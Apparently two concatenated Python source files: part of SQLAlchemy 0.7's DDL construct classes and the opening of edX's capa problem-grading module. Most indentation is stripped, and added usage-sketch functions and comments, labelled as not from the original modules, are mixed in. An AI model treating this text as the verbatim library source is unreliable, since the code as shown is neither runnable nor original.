:class:`.CreateTable`, :class:`.DropTable`, :class:`.AddConstraint`,
etc.
:class:`.DDLElement` integrates closely with SQLAlchemy events,
introduced in :ref:`event_toplevel`. An instance of one is
itself an event receiving callable::
event.listen(
users,
'after_create',
AddConstraint(constraint).execute_if(dialect='postgresql')
)
See also:
:class:`.DDL`
:class:`.DDLEvents`
:ref:`event_toplevel`
:ref:`schema_ddl_sequences`
"""
_execution_options = expression.Executable.\
_execution_options.union({'autocommit':True})
target = None
on = None
dialect = None
callable_ = None
def execute(self, bind=None, target=None):
"""Execute this DDL immediately.
        Executes the DDL statement in isolation using the supplied
        :class:`~sqlalchemy.engine.base.Connectable` or, if none is supplied,
        the :class:`~sqlalchemy.engine.base.Connectable` assigned to the
        ``.bind`` property. If the DDL has conditional ``on`` criteria, it
        will be invoked with None as the event.
:param bind:
Optional, an ``Engine`` or ``Connection``. If not supplied, a valid
:class:`~sqlalchemy.engine.base.Connectable` must be present in the
``.bind`` property.
:param target:
Optional, defaults to None. The target SchemaItem for the
execute call. Will be passed to the ``on`` callable if any,
and may also provide string expansion data for the
statement. See ``execute_at`` for more information.
"""
if bind is None:
bind = _bind_or_error(self)
if self._should_execute(target, bind):
return bind.execute(self.against(target))
else:
bind.engine.logger.info(
"DDL execution skipped, criteria not met.")
@util.deprecated("0.7", "See :class:`.DDLEvents`, as well as "
":meth:`.DDLElement.execute_if`.")
def execute_at(self, event_name, target):
"""Link execution of this DDL to the DDL lifecycle of a SchemaItem.
Links this ``DDLElement`` to a ``Table`` or ``MetaData`` instance,
executing it when that schema item is created or dropped. The DDL
statement will be executed using the same Connection and transactional
context as the Table create/drop itself. The ``.bind`` property of
this statement is ignored.
:param event:
One of the events defined in the schema item's ``.ddl_events``;
e.g. 'before-create', 'after-create', 'before-drop' or 'after-drop'
:param target:
The Table or MetaData instance for which this DDLElement will
be associated with.
A DDLElement instance can be linked to any number of schema items.
``execute_at`` builds on the ``append_ddl_listener`` interface of
:class:`.MetaData` and :class:`.Table` objects.
Caveat: Creating or dropping a Table in isolation will also trigger
any DDL set to ``execute_at`` that Table's MetaData. This may change
in a future release.
"""
def call_event(target, connection, **kw):
if self._should_execute_deprecated(event_name,
target, connection, **kw):
return connection.execute(self.against(target))
event.listen(target, "" + event_name.replace('-', '_'), call_event)
@expression._generative
def against(self, target):
"""Return a copy of this DDL against a specific schema item."""
self.target = target
@expression._generative
def execute_if(self, dialect=None, callable_=None, state=None):
"""Return a callable that will execute this
DDLElement conditionally.
Used to provide a wrapper for event listening::
event.listen(
metadata,
'before_create',
DDL("my_ddl").execute_if(dialect='postgresql')
)
:param dialect: May be a string, tuple or a callable
predicate. If a string, it will be compared to the name of the
executing database dialect::
DDL('something').execute_if(dialect='postgresql')
If a tuple, specifies multiple dialect names::
DDL('something').execute_if(dialect=('postgresql', 'mysql'))
:param callable_: A callable, which will be invoked with
four positional arguments as well as optional keyword
arguments:
:ddl:
This DDL element.
:target:
The :class:`.Table` or :class:`.MetaData` object which is the target of
this event. May be None if the DDL is executed explicitly.
:bind:
The :class:`.Connection` being used for DDL execution
:tables:
Optional keyword argument - a list of Table objects which are to
be created/ dropped within a MetaData.create_all() or drop_all()
method call.
:state:
Optional keyword argument - will be the ``state`` argument
passed to this function.
:checkfirst:
Keyword argument, will be True if the 'checkfirst' flag was
set during the call to ``create()``, ``create_all()``,
``drop()``, ``drop_all()``.
If the callable returns a true value, the DDL statement will be
executed.
:param state: any value which will be passed to the callable_
as the ``state`` keyword argument.
See also:
:class:`.DDLEvents`
:ref:`event_toplevel`
"""
self.dialect = dialect
self.callable_ = callable_
self.state = state
def _should_execute(self, target, bind, **kw):
if self.on is not None and \
not self._should_execute_deprecated(None, target, bind, **kw):
return False
if isinstance(self.dialect, basestring):
if self.dialect != bind.engine.name:
return False
elif isinstance(self.dialect, (tuple, list, set)):
if bind.engine.name not in self.dialect:
return False
if self.callable_ is not None and \
not self.callable_(self, target, bind, state=self.state, **kw):
return False
return True
def _should_execute_deprecated(self, event, target, bind, **kw):
if self.on is None:
return True
elif isinstance(self.on, basestring):
return self.on == bind.engine.name
elif isinstance(self.on, (tuple, list, set)):
return bind.engine.name in self.on
else:
return self.on(self, event, target, bind, **kw)
def __call__(self, target, bind, **kw):
"""Execute the DDL as a ddl_listener."""
if self._should_execute(target, bind, **kw):
return bind.execute(self.against(target))
def _check_ddl_on(self, on):
if (on is not None and
(not isinstance(on, (basestring, tuple, list, set)) and
not util.callable(on))):
raise exc.ArgumentError(
"Expected the name of a database dialect, a tuple "
"of names, or a callable for "
"'on' criteria, got type '%s'." % type(on).__name__)
def bind(self):
if self._bind:
return self._bind
def _set_bind(self, bind):
self._bind = bind
bind = property(bind, _set_bind)
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a
Dialect."""
return dialect.ddl_compiler(dialect, self, **kw)
class DDL(DDLElement):
"""A literal DDL statement.
Specifies literal SQL DDL to be executed by the database. DDL objects
function as DDL event listeners, and can be subscribed to those events
listed in :class:`.DDLEvents`, using either :class:`.Table` or :class:`.MetaData`
objects as targets. Basic templating support allows a single DDL instance
to handle repetitive tasks for multiple tables.
Examples::
from sqlalchemy import event, DDL
tbl = Table('users', metadata, Column('uid', Integer))
event.listen(tbl, 'before_create', DDL('DROP TRIGGER users_trigger'))
spow = DDL('ALTER TABLE %(table)s SET secretpowers TRUE')
event.listen(tbl, 'after_create', spow.execute_if(dialect='somedb'))
drop_spow = DDL('ALTER TABLE users SET secretpowers FALSE')
connection.execute(drop_spow)
When operating on Table events, the following ``statement``
    string substitutions are available::
%(table)s - the Table name, with any required quoting applied
%(schema)s - the schema name, with any required quoting applied
%(fullname)s - the Table name including schema, quoted if needed
The DDL's "context", if any, will be combined with the standard
    substitutions noted above. Keys present in the context will override
the standard substitutions.
"""
__visit_name__ = "ddl"
def __init__(self, statement, on=None, context=None, bind=None):
"""Create a DDL statement.
:param statement:
A string or unicode string to be executed. Statements will be
processed with Python's string formatting operator. See the
``context`` argument and the ``execute_at`` method.
A literal '%' in a statement must be escaped as '%%'.
SQL bind parameters are not available in DDL statements.
:param on:
Deprecated. See :meth:`.DDLElement.execute_if`.
Optional filtering criteria. May be a string, tuple or a callable
predicate. If a string, it will be compared to the name of the
executing database dialect::
DDL('something', on='postgresql')
If a tuple, specifies multiple dialect names::
DDL('something', on=('postgresql', 'mysql'))
If a callable, it will be invoked with four positional arguments
as well as optional keyword arguments:
:ddl:
This DDL element.
:event:
The name of the event that has triggered this DDL, such as
            'after-create'. Will be None if the DDL is executed explicitly.
:target:
The ``Table`` or ``MetaData`` object which is the target of
this event. May be None if the DDL is executed explicitly.
:connection:
The ``Connection`` being used for DDL execution
:tables:
Optional keyword argument - a list of Table objects which are to
be created/ dropped within a MetaData.create_all() or drop_all()
method call.
If the callable returns a true value, the DDL statement will be
executed.
:param context:
Optional dictionary, defaults to None. These values will be
available for use in string substitutions on the DDL statement.
:param bind:
Optional. A :class:`~sqlalchemy.engine.base.Connectable`, used by
default when ``execute()`` is invoked without a bind argument.
See also:
:class:`.DDLEvents`
:mod:`sqlalchemy.event`
"""
if not isinstance(statement, basestring):
raise exc.ArgumentError(
"Expected a string or unicode SQL statement, got '%r'" %
statement)
self.statement = statement
self.context = context or {}
self._check_ddl_on(on)
self.on = on
self._bind = bind
def __repr__(self):
return '<%s@%s; %s>' % (
type(self).__name__, id(self),
', '.join([repr(self.statement)] +
['%s=%r' % (key, getattr(self, key))
for key in ('on', 'context')
if getattr(self, key)]))
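# Hedged usage sketch (not from the original module): attaching a DDL
# statement to a table's after_create event, filtered by dialect via
# execute_if(). The trigger text and dialect name are illustrative only.
def _example_conditional_ddl():
    from sqlalchemy import MetaData, Table, Column, Integer, DDL, event

    meta = MetaData()
    tbl = Table('users', meta, Column('uid', Integer, primary_key=True))
    trig = DDL('CREATE TRIGGER users_trigger AFTER INSERT ON %(table)s '
               'BEGIN SELECT 1; END')
    # Fires only when the executing dialect is SQLite; %(table)s is expanded
    # using the substitutions documented on the DDL class above.
    event.listen(tbl, 'after_create', trig.execute_if(dialect='sqlite'))
    return tbl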
def _to_schema_column(element):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if not isinstance(element, Column):
raise exc.ArgumentError("schema.Column object expected")
return element
def _to_schema_column_or_string(element):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return element
class _CreateDropBase(DDLElement):
"""Base class for DDL constucts that represent CREATE and DROP or
equivalents.
The common theme of _CreateDropBase is a single
``element`` attribute which refers to the element
to be created or dropped.
"""
def __init__(self, element, on=None, bind=None):
self.element = element
self._check_ddl_on(on)
self.on = on
self.bind = bind
def _create_rule_disable(self, compiler):
"""Allow disable of _create_rule using a callable.
Pass to _create_rule using
util.portable_instancemethod(self._create_rule_disable)
to retain serializability.
"""
return False
class CreateTable(_CreateDropBase):
"""Represent a CREATE TABLE statement."""
__visit_name__ = "create_table"
class DropTable(_CreateDropBase):
"""Represent a DROP TABLE statement."""
__visit_name__ = "drop_table"
class CreateSequence(_CreateDropBase):
"""Represent a CREATE SEQUENCE statement."""
__visit_name__ = "create_sequence"
class DropSequence(_CreateDropBase):
"""Represent a DROP SEQUENCE statement."""
__visit_name__ = "drop_sequence"
class CreateIndex(_CreateDropBase):
"""Represent a CREATE INDEX statement."""
__visit_name__ = "create_index"
class DropIndex(_CreateDropBase):
"""Represent a DROP INDEX statement."""
__visit_name__ = "drop_index"
class AddConstraint(_CreateDropBase):
"""Represent an ALTER TABLE ADD CONSTRAINT statement."""
__visit_name__ = "add_constraint"
def __init__(self, element, *args, **kw):
super(AddConstraint, self).__init__(element, *args, **kw)
element._create_rule = util.portable_instancemethod(
self._create_rule_disable)
class DropConstraint(_CreateDropBase):
"""Represent an ALTER TABLE DROP CONSTRAINT statement."""
__visit_name__ = "drop_constraint"
def __init__(self, element, cascade=False, **kw):
self.cascade = cascade
super(DropConstraint, self).__init__(element, **kw)
element._create_rule = util.portable_instancemethod(
self._create_rule_disable)
def _bind_or_error(schemaitem, msg=None):
bind = schemaitem.bind
if not bind:
name = schemaitem.__class__.__name__
label = getattr(schemaitem, 'fullname',
getattr(schemaitem, 'name', None))
if label:
item = '%s %r' % (name, label)
else:
item = name
if isinstance(schemaitem, (MetaData, DDL)):
bindable = "the %s's .bind" % name
else:
bindable = "this %s's .metadata.bind" % name
if msg is None:
msg = "The %s is not bound to an Engine or Connection. "\
"Execution can not proceed without a database to execute "\
"against. Either execute with an explicit connection or "\
"assign %s to enable implicit execution." % \
(item, bindable)
raise exc.UnboundExecutionError(msg)
return bind
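# Hedged usage sketch (not from the original module): emitting a constraint
# via ALTER TABLE around create/drop using AddConstraint and DropConstraint
# as event listeners, mirroring the use_alter wiring above. Names are
# hypothetical.
def _example_add_drop_constraint_events():
    from sqlalchemy import (MetaData, Table, Column, Integer,
                            CheckConstraint, event)

    meta = MetaData()
    accounts = Table('accounts', meta, Column('balance', Integer))
    check = CheckConstraint('balance >= 0', name='ck_accounts_balance')
    accounts.append_constraint(check)
    # AddConstraint disables inline rendering of the constraint inside
    # CREATE TABLE (via _create_rule above) and issues ALTER TABLE after
    # the table exists; DropConstraint removes it before the table drops.
    event.listen(accounts, 'after_create', AddConstraint(check))
    event.listen(accounts, 'before_drop', DropConstraint(check))
    return accounts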
|
eunchong/build
|
third_party/sqlalchemy_0_7_1/sqlalchemy/schema.py
|
Python
|
bsd-3-clause
| 113,306
|
#
# File: capa/capa_problem.py
#
# Nomenclature:
#
# A capa Problem is a collection of text and capa Response questions.
# Each Response may have one or more Input entry fields.
# The capa problem may include a solution.
#
"""
Main module which shows problems (of "capa" type).
This is used by capa_module.
"""
from copy import deepcopy
from datetime import datetime
import logging
import os.path
import re
from lxml import etree
from pytz import UTC
from xml.sax.saxutils import unescape
from capa.correctmap import CorrectMap
import capa.inputtypes as inputtypes
import capa.customrender as customrender
import capa.responsetypes as responsetypes
from capa.util import contextualize_text, convert_files_to_filenames
import capa.xqueue_interface as xqueue_interface
from capa.safe_exec import safe_exec
# extra things displayed after "show answers" is pressed
solution_tags = ['solution']
# these get captured as student responses
response_properties = ["codeparam", "responseparam", "answer", "openendedparam"]
# special problem tags which should be turned into innocuous HTML
html_transforms = {
'problem': {'tag': 'div'},
'text': {'tag': 'span'},
'math': {'tag': 'span'},
}
# These should be removed from HTML output, including all subelements
html_problem_semantics = [
"codeparam",
"responseparam",
"answer",
"script",
"hintgroup",
"openendedparam",
"openendedrubric",
]
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# main class for this module
class LoncapaSystem(object):
"""
An encapsulation of resources needed from the outside.
These interfaces are collected here so that a caller of LoncapaProblem
    can provide these resources however makes sense for their environment, and
this code can remain independent.
Attributes:
i18n: an object implementing the `gettext.Translations` interface so
that we can use `.ugettext` to localize strings.
See :class:`ModuleSystem` for documentation of other attributes.
"""
def __init__( # pylint: disable=invalid-name
self,
ajax_url,
anonymous_student_id,
cache,
can_execute_unsafe_code,
get_python_lib_zip,
DEBUG, # pylint: disable=invalid-name
filestore,
i18n,
node_path,
render_template,
seed, # Why do we do this if we have self.seed?
STATIC_URL, # pylint: disable=invalid-name
xqueue,
matlab_api_key=None
):
self.ajax_url = ajax_url
self.anonymous_student_id = anonymous_student_id
self.cache = cache
self.can_execute_unsafe_code = can_execute_unsafe_code
self.get_python_lib_zip = get_python_lib_zip
self.DEBUG = DEBUG # pylint: disable=invalid-name
self.filestore = filestore
self.i18n = i18n
self.node_path = node_path
self.render_template = render_template
self.seed = seed # Why do we do this if we have self.seed?
self.STATIC_URL = STATIC_URL # pylint: disable=invalid-name
self.xqueue = xqueue
self.matlab_api_key = matlab_api_key
class LoncapaProblem(object):
"""
Main class for capa Problems.
"""
def __init__(self, problem_text, id, capa_system, capa_module, # pylint: disable=redefined-builtin
state=None, seed=None):
"""
Initializes capa Problem.
Arguments:
problem_text (string): xml defining the problem.
id (string): identifier for this problem, often a filename (no spaces).
capa_system (LoncapaSystem): LoncapaSystem instance which provides OS,
rendering, user context, and other resources.
capa_module: instance needed to access runtime/logging
state (dict): containing the following keys:
- `seed` (int) random number generator seed
- `student_answers` (dict) maps input id to the stored answer for that input
- `correct_map` (CorrectMap) a map of each input to their 'correctness'
- `done` (bool) indicates whether or not this problem is considered done
- `input_state` (dict) maps input_id to a dictionary that holds the state for that input
seed (int): random number generator seed.
"""
## Initialize class variables from state
self.do_reset()
self.problem_id = id
self.capa_system = capa_system
self.capa_module = capa_module
state = state or {}
# Set seed according to the following priority:
# 1. Contained in problem's state
# 2. Passed into capa_problem via constructor
self.seed = state.get('seed', seed)
assert self.seed is not None, "Seed must be provided for LoncapaProblem."
self.student_answers = state.get('student_answers', {})
if 'correct_map' in state:
self.correct_map.set_dict(state['correct_map'])
self.done = state.get('done', False)
self.input_state = state.get('input_state', {})
# Convert startouttext and endouttext to proper <text></text>
problem_text = re.sub(r"startouttext\s*/", "text", problem_text)
problem_text = re.sub(r"endouttext\s*/", "/text", problem_text)
self.problem_text = problem_text
# parse problem XML file into an element tree
self.tree = etree.XML(problem_text)
self.make_xml_compatible(self.tree)
# handle any <include file="foo"> tags
self._process_includes()
# construct script processor context (eg for customresponse problems)
self.context = self._extract_context(self.tree)
# Pre-parse the XML tree: modifies it to add ID's and perform some in-place
# transformations. This also creates the dict (self.responders) of Response
# instances for each question in the problem. The dict has keys = xml subtree of
# Response, values = Response instance
self._preprocess_problem(self.tree)
if not self.student_answers: # True when student_answers is an empty dict
self.set_initial_display()
# dictionary of InputType objects associated with this problem
# input_id string -> InputType object
self.inputs = {}
# Run response late_transforms last (see MultipleChoiceResponse)
# Sort the responses to be in *_1 *_2 ... order.
responses = self.responders.values()
responses = sorted(responses, key=lambda resp: int(resp.id[resp.id.rindex('_') + 1:]))
for response in responses:
if hasattr(response, 'late_transforms'):
response.late_transforms(self)
self.extracted_tree = self._extract_html(self.tree)
def make_xml_compatible(self, tree):
"""
Adjust tree xml in-place for compatibility before creating
a problem from it.
The idea here is to provide a central point for XML translation,
        for example, supporting an old XML format. At present, there are just two translations.
1. <additional_answer> compatibility translation:
old: <additional_answer>ANSWER</additional_answer>
convert to
            new: <additional_answer answer="ANSWER">OPTIONAL-HINT</additional_answer>
2. <optioninput> compatibility translation:
optioninput works like this internally:
<optioninput options="('yellow','blue','green')" correct="blue" />
With extended hints there is a new <option> tag, like this
<option correct="True">blue <optionhint>sky color</optionhint> </option>
This translation takes in the new format and synthesizes the old option= attribute
so all downstream logic works unchanged with the new <option> tag format.
"""
additionals = tree.xpath('//stringresponse/additional_answer')
for additional in additionals:
answer = additional.get('answer')
text = additional.text
if not answer and text: # trigger of old->new conversion
additional.set('answer', text)
additional.text = ''
for optioninput in tree.xpath('//optioninput'):
correct_option = None
child_options = []
for option_element in optioninput.findall('./option'):
option_name = option_element.text.strip()
if option_element.get('correct').upper() == 'TRUE':
correct_option = option_name
child_options.append("'" + option_name + "'")
if len(child_options) > 0:
options_string = '(' + ','.join(child_options) + ')'
optioninput.attrib.update({'options': options_string})
if correct_option:
optioninput.attrib.update({'correct': correct_option})
def do_reset(self):
"""
Reset internal state to unfinished, with no answers
"""
self.student_answers = dict()
self.correct_map = CorrectMap()
self.done = False
def set_initial_display(self):
"""
Set the student's answers to the responders' initial displays, if specified.
"""
initial_answers = dict()
for responder in self.responders.values():
if hasattr(responder, 'get_initial_display'):
initial_answers.update(responder.get_initial_display())
self.student_answers = initial_answers
def __unicode__(self):
return u"LoncapaProblem ({0})".format(self.problem_id)
def get_state(self):
"""
        Stored per-user session data needed to:
1) Recreate the problem
2) Populate any student answers.
"""
return {'seed': self.seed,
'student_answers': self.student_answers,
'correct_map': self.correct_map.get_dict(),
'input_state': self.input_state,
'done': self.done}
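    # Hedged illustration (not part of the original file): the dict returned by
    # get_state() can be passed back through the ``state`` constructor argument
    # to rebuild an equivalent problem for the same student, e.g. (names here
    # are hypothetical):
    #
    #   saved = problem.get_state()
    #   restored = LoncapaProblem(problem_text, problem.problem_id,
    #                             capa_system, capa_module, state=saved)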
def get_max_score(self):
"""
Return the maximum score for this problem.
"""
maxscore = 0
for responder in self.responders.values():
maxscore += responder.get_max_score()
return maxscore
def get_score(self):
"""
Compute score for this problem. The score is the number of points awarded.
Returns a dictionary {'score': integer, from 0 to get_max_score(),
'total': get_max_score()}.
"""
correct = 0
for key in self.correct_map:
try:
correct += self.correct_map.get_npoints(key)
except Exception:
log.error('key=%s, correct_map = %s', key, self.correct_map)
raise
if (not self.student_answers) or len(self.student_answers) == 0:
return {'score': 0,
'total': self.get_max_score()}
else:
return {'score': correct,
'total': self.get_max_score()}
def update_score(self, score_msg, queuekey):
"""
Deliver grading response (e.g. from async code checking) to
the specific ResponseType that requested grading
Returns an updated CorrectMap
"""
cmap = CorrectMap()
cmap.update(self.correct_map)
for responder in self.responders.values():
if hasattr(responder, 'update_score'):
# Each LoncapaResponse will update its specific entries in cmap
# cmap is passed by reference
responder.update_score(score_msg, cmap, queuekey)
self.correct_map.set_dict(cmap.get_dict())
return cmap
def ungraded_response(self, xqueue_msg, queuekey):
"""
Handle any responses from the xqueue that do not contain grades
Will try to pass the queue message to all inputtypes that can handle ungraded responses
Does not return any value
"""
# check against each inputtype
for the_input in self.inputs.values():
# if the input type has an ungraded function, pass in the values
if hasattr(the_input, 'ungraded_response'):
the_input.ungraded_response(xqueue_msg, queuekey)
def is_queued(self):
"""
Returns True if any part of the problem has been submitted to an external queue
(e.g. for grading.)
"""
return any(self.correct_map.is_queued(answer_id) for answer_id in self.correct_map)
def get_recentmost_queuetime(self):
"""
Returns a DateTime object that represents the timestamp of the most recent
queueing request, or None if not queued
"""
if not self.is_queued():
return None
# Get a list of timestamps of all queueing requests, then convert it to a DateTime object
queuetime_strs = [
self.correct_map.get_queuetime_str(answer_id)
for answer_id in self.correct_map
if self.correct_map.is_queued(answer_id)
]
queuetimes = [
datetime.strptime(qt_str, xqueue_interface.dateformat).replace(tzinfo=UTC)
for qt_str in queuetime_strs
]
return max(queuetimes)
def grade_answers(self, answers):
"""
Grade student responses. Called by capa_module.check_problem.
`answers` is a dict of all the entries from request.POST, but with the first part
of each key removed (the string before the first "_").
Thus, for example, input_ID123 -> ID123, and input_fromjs_ID123 -> fromjs_ID123
Calls the Response for each question in this problem, to do the actual grading.
"""
# if answers include File objects, convert them to filenames.
self.student_answers = convert_files_to_filenames(answers)
return self._grade_answers(answers)
def supports_rescoring(self):
"""
Checks that the current problem definition permits rescoring.
More precisely, it checks that there are no response types in
the current problem that are not fully supported (yet) for rescoring.
This includes responsetypes for which the student's answer
is not properly stored in state, i.e. file submissions. At present,
we have no way to know if an existing response was actually a real
answer or merely the filename of a file submitted as an answer.
It turns out that because rescoring is a background task, limiting
it to responsetypes that don't support file submissions also means
that the responsetypes are synchronous. This is convenient as it
permits rescoring to be complete when the rescoring call returns.
"""
return all('filesubmission' not in responder.allowed_inputfields for responder in self.responders.values())
def rescore_existing_answers(self):
"""
Rescore student responses. Called by capa_module.rescore_problem.
"""
return self._grade_answers(None)
def _grade_answers(self, student_answers):
"""
Internal grading call used for checking new 'student_answers' and also
rescoring existing student_answers.
For new student_answers being graded, `student_answers` is a dict of all the
entries from request.POST, but with the first part of each key removed
(the string before the first "_"). Thus, for example,
input_ID123 -> ID123, and input_fromjs_ID123 -> fromjs_ID123.
For rescoring, `student_answers` is None.
Calls the Response for each question in this problem, to do the actual grading.
"""
# old CorrectMap
oldcmap = self.correct_map
# start new with empty CorrectMap
newcmap = CorrectMap()
# Call each responsetype instance to do actual grading
for responder in self.responders.values():
# File objects are passed only if responsetype explicitly allows
# for file submissions. But we have no way of knowing if
# student_answers contains a proper answer or the filename of
# an earlier submission, so for now skip these entirely.
# TODO: figure out where to get file submissions when rescoring.
if 'filesubmission' in responder.allowed_inputfields and student_answers is None:
_ = self.capa_system.i18n.ugettext
raise Exception(_(u"Cannot rescore problems with possible file submissions"))
# use 'student_answers' only if it is provided, and if it might contain a file
# submission that would not exist in the persisted "student_answers".
if 'filesubmission' in responder.allowed_inputfields and student_answers is not None:
results = responder.evaluate_answers(student_answers, oldcmap)
else:
results = responder.evaluate_answers(self.student_answers, oldcmap)
newcmap.update(results)
self.correct_map = newcmap
return newcmap
def get_question_answers(self):
"""
Returns a dict of answer_ids to answer values. If we cannot generate
an answer (this sometimes happens in customresponses), that answer_id is
not included. Called by "show answers" button JSON request
(see capa_module)
"""
# dict of (id, correct_answer)
answer_map = dict()
for response in self.responders.keys():
results = self.responder_answers[response]
answer_map.update(results)
# include solutions from <solution>...</solution> stanzas
for entry in self.tree.xpath("//" + "|//".join(solution_tags)):
answer = etree.tostring(entry)
if answer:
answer_map[entry.get('id')] = contextualize_text(answer, self.context)
log.debug('answer_map = %s', answer_map)
return answer_map
def get_answer_ids(self):
"""
Return the IDs of all the responses -- these are the keys used for
        the dicts returned by grade_answers and get_question_answers. (Though
        get_question_answers may only return a subset of these.)
"""
answer_ids = []
for response in self.responders.keys():
results = self.responder_answers[response]
answer_ids.append(results.keys())
return answer_ids
def do_targeted_feedback(self, tree):
"""
Implements targeted-feedback in-place on <multiplechoiceresponse> --
choice-level explanations shown to a student after submission.
Does nothing if there is no targeted-feedback attribute.
"""
        # Note that the modifications have been done, avoiding problems if called twice.
if hasattr(self, 'has_targeted'):
return
self.has_targeted = True # pylint: disable=attribute-defined-outside-init
for mult_choice_response in tree.xpath('//multiplechoiceresponse[@targeted-feedback]'):
show_explanation = mult_choice_response.get('targeted-feedback') == 'alwaysShowCorrectChoiceExplanation'
# Grab the first choicegroup (there should only be one within each <multiplechoiceresponse> tag)
choicegroup = mult_choice_response.xpath('./choicegroup[@type="MultipleChoice"]')[0]
choices_list = list(choicegroup.iter('choice'))
# Find the student answer key that matches our <choicegroup> id
student_answer = self.student_answers.get(choicegroup.get('id'))
expl_id_for_student_answer = None
# Keep track of the explanation-id that corresponds to the student's answer
# Also, keep track of the solution-id
solution_id = None
for choice in choices_list:
if choice.get('name') == student_answer:
expl_id_for_student_answer = choice.get('explanation-id')
if choice.get('correct') == 'true':
solution_id = choice.get('explanation-id')
# Filter out targetedfeedback that doesn't correspond to the answer the student selected
# Note: following-sibling will grab all following siblings, so we just want the first in the list
targetedfeedbackset = mult_choice_response.xpath('./following-sibling::targetedfeedbackset')
if len(targetedfeedbackset) != 0:
targetedfeedbackset = targetedfeedbackset[0]
targetedfeedbacks = targetedfeedbackset.xpath('./targetedfeedback')
for targetedfeedback in targetedfeedbacks:
                    # Don't show targeted feedback if the student hasn't answered the problem
# or if the target feedback doesn't match the student's (incorrect) answer
if not self.done or targetedfeedback.get('explanation-id') != expl_id_for_student_answer:
targetedfeedbackset.remove(targetedfeedback)
# Do not displace the solution under these circumstances
if not show_explanation or not self.done:
continue
# The next element should either be <solution> or <solutionset>
next_element = targetedfeedbackset.getnext()
parent_element = tree
solution_element = None
if next_element is not None and next_element.tag == 'solution':
solution_element = next_element
elif next_element is not None and next_element.tag == 'solutionset':
solutions = next_element.xpath('./solution')
for solution in solutions:
if solution.get('explanation-id') == solution_id:
parent_element = next_element
solution_element = solution
            # If we could not find the solution element, skip the remaining steps below
if solution_element is None:
continue
# Change our correct-choice explanation from a "solution explanation" to within
# the set of targeted feedback, which means the explanation will render on the page
# without the student clicking "Show Answer" or seeing a checkmark next to the correct choice
parent_element.remove(solution_element)
# Add our solution instead to the targetedfeedbackset and change its tag name
solution_element.tag = 'targetedfeedback'
targetedfeedbackset.append(solution_element)
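    # Hedged illustration (not part of the original file): the XML shape that
    # do_targeted_feedback() operates on. Tag and attribute names follow the
    # xpath queries above; the concrete names and ids are hypothetical.
    #
    #   <multiplechoiceresponse targeted-feedback="alwaysShowCorrectChoiceExplanation">
    #     <choicegroup type="MultipleChoice">
    #       <choice correct="false" name="choice_0" explanation-id="feedback1">A</choice>
    #       <choice correct="true" name="choice_1" explanation-id="feedbackC">B</choice>
    #     </choicegroup>
    #   </multiplechoiceresponse>
    #   <targetedfeedbackset>
    #     <targetedfeedback explanation-id="feedback1">...</targetedfeedback>
    #   </targetedfeedbackset>
    #   <solutionset>
    #     <solution explanation-id="feedbackC">...</solution>
    #   </solutionset>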
def get_html(self):
"""
Main method called externally to get the HTML to be rendered for this capa Problem.
"""
self.do_targeted_feedback(self.tree)
html = contextualize_text(etree.tostring(self._extract_html(self.tree)), self.context)
return html
def handle_input_ajax(self, data):
"""
InputTypes can support specialized AJAX calls. Find the correct input and pass along the correct data
Also, parse out the dispatch from the get so that it can be passed onto the input type nicely
"""
# pull out the id
input_id = data['input_id']
if self.inputs[input_id]:
dispatch = data['dispatch']
return self.inputs[input_id].handle_ajax(dispatch, data)
else:
log.warning("Could not find matching input for id: %s", input_id)
return {}
@property
def has_multi_device_support(self):
"""
Returns whether this capa problem has multi-device support.
"""
return all(
responder.multi_device_support for responder in self.responders.values()
)
# ======= Private Methods Below ========
def _process_includes(self):
"""
Handle any <include file="foo"> tags by reading in the specified file and inserting it
into our XML tree. Fail gracefully if debugging.
"""
includes = self.tree.findall('.//include')
for inc in includes:
filename = inc.get('file')
if filename is not None:
try:
# open using LoncapaSystem OSFS filestore
ifp = self.capa_system.filestore.open(filename)
except Exception as err:
log.warning(
'Error %s in problem xml include: %s',
err,
etree.tostring(inc, pretty_print=True)
)
log.warning(
'Cannot find file %s in %s', filename, self.capa_system.filestore
)
# if debugging, don't fail - just log error
# TODO (vshnayder): need real error handling, display to users
if not self.capa_system.DEBUG:
raise
else:
continue
try:
# read in and convert to XML
incxml = etree.XML(ifp.read())
except Exception as err:
log.warning(
'Error %s in problem xml include: %s',
err,
etree.tostring(inc, pretty_print=True)
)
log.warning('Cannot parse XML in %s', (filename))
# if debugging, don't fail - just log error
# TODO (vshnayder): same as above
if not self.capa_system.DEBUG:
raise
else:
continue
# insert new XML into tree in place of include
parent = inc.getparent()
parent.insert(parent.index(inc), incxml)
parent.remove(inc)
log.debug('Included %s into %s', filename, self.problem_id)
def _extract_system_path(self, script):
"""
Extracts and normalizes additional paths for code execution.
For now, there's a default path of data/course/code; this may be removed
at some point.
script : ?? (TODO)
"""
DEFAULT_PATH = ['code']
# Separate paths by :, like the system path.
raw_path = script.get('system_path', '').split(":") + DEFAULT_PATH
# find additional comma-separated modules search path
path = []
for dir in raw_path:
if not dir:
continue
# path is an absolute path or a path relative to the data dir
dir = os.path.join(self.capa_system.filestore.root_path, dir)
# Check that we are within the filestore tree.
reldir = os.path.relpath(dir, self.capa_system.filestore.root_path)
if ".." in reldir:
log.warning("Ignoring Python directory outside of course: %r", dir)
continue
abs_dir = os.path.normpath(dir)
path.append(abs_dir)
return path
def _extract_context(self, tree):
"""
Extract content of <script>...</script> from the problem.xml file, and exec it in the
context of this problem. Provides ability to randomize problems, and also set
variables for problem answer checking.
Problem XML goes to Python execution context. Runs everything in script tags.
"""
context = {}
context['seed'] = self.seed
context['anonymous_student_id'] = self.capa_system.anonymous_student_id
all_code = ''
python_path = []
for script in tree.findall('.//script'):
stype = script.get('type')
if stype:
if 'javascript' in stype:
continue # skip javascript
if 'perl' in stype:
continue # skip perl
# TODO: evaluate only python
for d in self._extract_system_path(script):
if d not in python_path and os.path.exists(d):
python_path.append(d)
            XMLESC = {"&apos;": "'", "&quot;": '"'}
code = unescape(script.text, XMLESC)
all_code += code
extra_files = []
if all_code:
# An asset named python_lib.zip can be imported by Python code.
zip_lib = self.capa_system.get_python_lib_zip()
if zip_lib is not None:
extra_files.append(("python_lib.zip", zip_lib))
python_path.append("python_lib.zip")
try:
safe_exec(
all_code,
context,
random_seed=self.seed,
python_path=python_path,
extra_files=extra_files,
cache=self.capa_system.cache,
